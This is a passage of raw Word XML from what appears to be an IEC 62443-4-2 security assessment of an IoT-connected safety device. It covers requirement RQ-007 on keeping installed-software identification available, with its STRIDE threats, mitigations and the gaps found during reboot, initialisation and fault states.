                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D1FAD43" w14:textId="6CECFE56" w:rsidR="007C3962" w:rsidRPr="006D5B99" w:rsidRDefault="007C3962" w:rsidP="007C396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plaintext transmission confirmed (defense-in-depth observation, no safety-security FAIL per EN 50742 FR4).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BA8E6F5" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRPr="006D5B99" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59C2A41B" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRPr="006D5B99" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E91BFEB" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRPr="006D5B99" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA7E928" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRPr="006D5B99" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A5D353" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRPr="006D5B99" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771C1809" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRPr="006D5B99" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8892BD" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRPr="006D5B99" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C265AC0" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRPr="006D5B99" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9B0F49" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRPr="006D5B99" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D6A755" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRPr="006D5B99" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2824B1AF" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRPr="006D5B99" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C411AD9" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRPr="006D5B99" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C834132" w14:textId="77777777" w:rsidR="00C86F5F" w:rsidRPr="006D5B99" w:rsidRDefault="00C86F5F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E20CCBC" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="425EC8B5" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="335950EC" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C7A932" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643E8F46" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04CD29F3" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AA38C89" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05615304" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F5FA8A" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6998D18C" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C03BEB6" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DCF2520" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66331D54" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4B9E25" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="144FC6B6" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D749597" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBEAA3B" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71EED710" w14:textId="77777777" w:rsidR="00FA0624" w:rsidRPr="006D5B99" w:rsidRDefault="00FA0624" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40FEF058" w14:textId="77777777" w:rsidR="00F0015F" w:rsidRPr="006D5B99" w:rsidRDefault="00F0015F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B2D12E" w14:textId="65C7E73D" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>REQUIREMENT 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0FB5F8" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 1: Critical Review &amp; Theoretical Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176AC578" w14:textId="7999D1AB" w:rsidR="00276049" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00276049" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-007</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762640AA" w14:textId="1AF3EAE9" w:rsidR="00276049" w:rsidRPr="006D5B99" w:rsidRDefault="00276049" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system shall be able to provide the identification information of safety-relevant installed software at all times in an easily accessible form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348BC32D" w14:textId="59AE452E" w:rsidR="00276049" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IEC 62443-4-2 CR</w:t>
      </w:r>
      <w:r w:rsidR="00F468B5"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276049" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00493DA4" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 6.1</w:t>
      </w:r>
      <w:r w:rsidR="002468DB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00276049" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 7.1, CR 7.2</w:t>
      </w:r>
      <w:r w:rsidR="002468DB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, CR 7.7</w:t>
      </w:r>
      <w:r w:rsidR="00705C55" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (supporting)</w:t>
      </w:r>
      <w:r w:rsidR="002468DB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, CR 7.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CB7447" w14:textId="7CC5EF3D" w:rsidR="00276049" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00921BF4" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D (identification data</w:t>
      </w:r>
      <w:r w:rsidR="009964C1" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00921BF4" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- at all times); </w:t>
      </w:r>
      <w:r w:rsidR="00997E9A" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F (Domain separation-availability dependency)</w:t>
      </w:r>
      <w:r w:rsidR="00921BF4" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; H (IoT-Core service Availability);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4838CD51" w14:textId="777316A6" w:rsidR="00276049" w:rsidRPr="006D5B99" w:rsidRDefault="00196EB6" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00276049" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Denial of Service</w:t>
      </w:r>
      <w:r w:rsidR="007E3134" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00CE4956" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FF4D96" w14:textId="77777777" w:rsidR="00C825F3" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AF855B" w14:textId="422B0153"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Max 2 concurrent HTTP connections (SRIO-7909): intended as DoS protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039BD0D3" w14:textId="252D568A"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Incoming-only, no outgoing/subscription</w:t>
      </w:r>
      <w:r w:rsidR="00144991" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(SRIO-7908).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA6DD30" w14:textId="6223EBA2"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IoT-Core Visualizer (browser, by IP)</w:t>
      </w:r>
      <w:r w:rsidR="00144991" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(SRIO-7914)</w:t>
      </w:r>
      <w:r w:rsidR="00144991" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>satisfies ‘easily accessible form’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA82BA" w14:textId="0AE375C1" w:rsidR="004C6315" w:rsidRPr="006D5B99" w:rsidRDefault="004C6315" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP served by non-safety COM (QM) only</w:t>
      </w:r>
      <w:r w:rsidR="00144991" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: S</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tated as a structural limitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26608933" w14:textId="77777777" w:rsidR="000B7634" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691EF51C" w14:textId="5D2C69D2" w:rsidR="00E57060" w:rsidRPr="006D5B99" w:rsidRDefault="00231EB5" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-1</w:t>
      </w:r>
      <w:r w:rsidR="00E57060" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Identification is</w:t>
      </w:r>
      <w:r w:rsidR="009964C1" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> not</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> available at all times: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2C849A" w14:textId="7304DD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(a) install reboot (/firmware/install </w:t>
      </w:r>
      <w:r w:rsidR="00E57060" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> reboot, SRIO-2953); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F94E48" w14:textId="77777777" w:rsidR="00E57060" w:rsidRPr="006D5B99" w:rsidRDefault="00231EB5" w:rsidP="00E57060">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(b) Init at every power-on before IoT-Core is up (SRIO-1417); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4F70E6" w14:textId="77777777" w:rsidR="009470E7" w:rsidRPr="006D5B99" w:rsidRDefault="00231EB5" w:rsidP="00E57060">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(c) SCPU-flash window </w:t>
      </w:r>
      <w:r w:rsidR="00E57060" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SCPU-sourced identifiers absent (SRIO-15759); (d) FatalError safe-state hold (SRIO-15757); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0600EFD6" w14:textId="0BF72E80" w:rsidR="00231EB5" w:rsidRPr="006D5B99" w:rsidRDefault="00231EB5" w:rsidP="00E57060">
      <w:pPr>
